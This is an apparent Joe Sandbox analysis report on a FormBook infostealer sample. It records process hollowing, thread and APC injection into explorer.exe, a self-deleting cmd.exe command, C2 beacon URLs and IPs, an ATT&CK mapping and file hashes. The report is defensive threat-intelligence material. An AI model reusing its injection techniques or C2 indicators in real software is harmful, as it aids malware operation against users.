Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A89100 mov eax, dword ptr fs:[00000030h]	9_2_02A89100
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8C962 mov eax, dword ptr fs:[00000030h]	9_2_02A8C962
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8B171 mov eax, dword ptr fs:[00000030h]	9_2_02A8B171
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8B171 mov eax, dword ptr fs:[00000030h]	9_2_02A8B171
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AAC577 mov eax, dword ptr fs:[00000030h]	9_2_02AAC577
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AAC577 mov eax, dword ptr fs:[00000030h]	9_2_02AAC577
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AAB944 mov eax, dword ptr fs:[00000030h]	9_2_02AAB944
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AAB944 mov eax, dword ptr fs:[00000030h]	9_2_02AAB944
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC3D43 mov eax, dword ptr fs:[00000030h]	9_2_02AC3D43
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B03540 mov eax, dword ptr fs:[00000030h]	9_2_02B03540
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AA7D50 mov eax, dword ptr fs:[00000030h]	9_2_02AA7D50

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 154.214.84.117 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.intentguild.com
Source: C:\Windows\explorer.exe	Domain query: www.didyouswipe.com
Source: C:\Windows\explorer.exe	Network Connect: 104.161.84.111 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.uebfaushb.com

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Memory written: C:\Users\user\Desktop\GiG35Rwmz6.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Thread register set: target process: 3424			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Section unmapped: C:\Windows\SysWOW64\help.exe base address: 50000

Jump to behavior

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process created: C:\Users\user\Desktop\GiG35Rwmz6.exe C:\Users\user\Desktop\GiG35Rwmz6.exe			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\GiG35Rwmz6.exe'			Jump to behavior

Source: explorer.exe, 00000005.00000000.708276288.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.708673319.0000000001080000.00000002.00000001.sdmp, help.exe, 00000009.00000002.927110416.0000000004030000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.708673319.0000000001080000.00000002.00000001.sdmp, help.exe, 00000009.00000002.927110416.0000000004030000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.708673319.0000000001080000.00000002.00000001.sdmp, help.exe, 00000009.00000002.927110416.0000000004030000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.708673319.0000000001080000.00000002.00000001.sdmp, help.exe, 00000009.00000002.927110416.0000000004030000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.699012653.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Queries volume information: C:\Users\user\Desktop\GiG35Rwmz6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Rootkit1	Credential API Hooking1	Security Software Discovery221	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion31	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection612	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information4	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing23	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
GiG35Rwmz6.exe	40%	Virustotal		Browse
GiG35Rwmz6.exe	35%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun
GiG35Rwmz6.exe	100%	Avira	HEUR/AGEN.1141549
GiG35Rwmz6.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.0.GiG35Rwmz6.exe.430000.0.unpack	100%	Avira	HEUR/AGEN.1141549	Download File
0.0.GiG35Rwmz6.exe.3c0000.0.unpack	100%	Avira	HEUR/AGEN.1141549	Download File
4.0.GiG35Rwmz6.exe.430000.2.unpack	100%	Avira	HEUR/AGEN.1141549	Download File
0.2.GiG35Rwmz6.exe.3c0000.0.unpack	100%	Avira	HEUR/AGEN.1134873	Download File
4.0.GiG35Rwmz6.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
4.2.GiG35Rwmz6.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
4.2.GiG35Rwmz6.exe.430000.1.unpack	100%	Avira	HEUR/AGEN.1141549	Download File

Domains

Source	Detection	Scanner	Label	Link
www.intentguild.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.intentguild.com/n8ud/?vPE=5jrT8R0&hL=WvvELDNeXjXNSBNWuUY8Zfoe6Ppc+GsA8iptXd2KegdndXiZdpjCN7GBAWkC1K0OIvRU	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.didyouswipe.com/n8ud/?hL=xx0OFN/A1LQZVCJMLzEbxnX8OnCdv1d2voKBm1sodMz7PL+00tIAVi4krCco92VzLf77&vPE=5jrT8R0	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
www.studiooculto.com/n8ud/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.intentguild.com	104.161.84.111	true	true	0%, Virustotal, Browse	unknown
www.didyouswipe.com	154.214.84.117	true	true		unknown
www.hometheaterplanning.com	unknown	unknown	true		unknown
www.uebfaushb.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.intentguild.com/n8ud/?vPE=5jrT8R0&hL=WvvELDNeXjXNSBNWuUY8Zfoe6Ppc+GsA8iptXd2KegdndXiZdpjCN7GBAWkC1K0OIvRU	true	Avira URL Cloud: safe	unknown
http://www.didyouswipe.com/n8ud/?hL=xx0OFN/A1LQZVCJMLzEbxnX8OnCdv1d2voKBm1sodMz7PL+00tIAVi4krCco92VzLf77&vPE=5jrT8R0	true	Avira URL Cloud: safe	unknown
www.studiooculto.com/n8ud/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	explorer.exe, 00000005.00000000.680176172.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.161.84.111	www.intentguild.com	United States		53755	IOFLOODUS	true
154.214.84.117	www.didyouswipe.com	Seychelles		134548	DXTL-HKDXTLTseungKwanOServiceHK	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	432733
Start date:	10.06.2021
Start time:	17:53:16
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	GiG35Rwmz6 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@4/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 46.7% (good quality ratio 42.7%) Quality average: 69.2% Quality standard deviation: 32.3%
HCA Information:	Successful, ratio: 97% Number of executed functions: 78 Number of non-executed functions: 156
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.43.139.144, 20.82.209.183, 204.79.197.200, 13.107.21.200, 104.42.151.234, 92.122.145.220, 13.64.90.137, 20.75.105.140, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.210.154 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:54:13	API Interceptor	1x Sleep call for process: GiG35Rwmz6.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
IOFLOODUS	Order.exe	Get hash	malicious	Browse	107.167.72.29
	XiTAmVLm88EpcSc.exe	Get hash	malicious	Browse	23.226.65.164
	Shipment Document BLINV and packing list.exe	Get hash	malicious	Browse	104.161.123.48
	Shipment Document BLINV and packing list.exe	Get hash	malicious	Browse	104.161.123.48
	ESTATE LATE GOVENDER.docx	Get hash	malicious	Browse	107.167.92.221
	XIYpA2JhpD.exe	Get hash	malicious	Browse	107.178.78.108
	1bb71f86_by_Libranalysis.exe	Get hash	malicious	Browse	107.167.92.221
	gCcAUOanux.exe	Get hash	malicious	Browse	23.226.65.164
	KVYhrHPAgF.exe	Get hash	malicious	Browse	104.161.54.152
	New Purchase Order.exe	Get hash	malicious	Browse	104.161.87.36
	qdGS4VJVZD.exe	Get hash	malicious	Browse	107.178.102.110
	HXHpRUwveo.exe	Get hash	malicious	Browse	23.226.64.21
	Material Requisition for Quotation (MRQ).exe	Get hash	malicious	Browse	107.189.162.104
	Pd0Tb0v0WW.exe	Get hash	malicious	Browse	23.226.65.187
	LtfVNumoON.exe	Get hash	malicious	Browse	23.226.65.187
	RCS76393.exe	Get hash	malicious	Browse	104.161.84.100
	Betaling_advies.exe	Get hash	malicious	Browse	107.178.109.19
	Statement of Account.xlsx	Get hash	malicious	Browse	23.226.65.187
	Invoice.xlsx	Get hash	malicious	Browse	23.226.65.187
	MACHINE SPECIFICATION.exe	Get hash	malicious	Browse	104.161.56.143
DXTL-HKDXTLTseungKwanOServiceHK	RFQ-21-QAI-OPS-0067 (7000000061).exe	Get hash	malicious	Browse	154.84.83.5
	kmEVWJjPV6esObh.exe	Get hash	malicious	Browse	45.203.107.209
	rtgs_pdf.exe	Get hash	malicious	Browse	154.218.86.231
	Invoice number FV0062022020.exe	Get hash	malicious	Browse	154.80.207.57
	MT103-payment confirmation.xlsx	Get hash	malicious	Browse	154.84.76.49
	New Order Vung Ang TPP Viet Nam.exe	Get hash	malicious	Browse	45.194.139.173
	17jLieeOPx.exe	Get hash	malicious	Browse	156.237.130.173
	SKMBT41085NC9.exe	Get hash	malicious	Browse	154.212.65.23
	Product_Samples.exe	Get hash	malicious	Browse	154.95.193.124
	RE; KOC RFQ for Flangers - RFQ 22965431.exe	Get hash	malicious	Browse	154.83.72.159
	RE KOC RFQ for Flanges - RFQ 2074898.exe	Get hash	malicious	Browse	154.83.72.159
	item.exe	Get hash	malicious	Browse	154.95.193.124
	Payment SWIFT_Pdf.exe	Get hash	malicious	Browse	45.199.77.202
	Payment Advice-Pdf.exe	Get hash	malicious	Browse	45.199.77.202
	Ack0527073465.exe	Get hash	malicious	Browse	154.93.191.132
	PO#270521.pdf.exe	Get hash	malicious	Browse	154.80.241.154
	List doc__Pdf.exe	Get hash	malicious	Browse	156.238.108.75
	#U20ac9,770 pdf.exe	Get hash	malicious	Browse	156.239.112.237
	Taisier Med Surgical Sutures.exe	Get hash	malicious	Browse	45.199.37.6
	PO_0065-2021.exe	Get hash	malicious	Browse	154.90.73.180

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GiG35Rwmz6.exe.log Download File
Process:	C:\Users\user\Desktop\GiG35Rwmz6.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
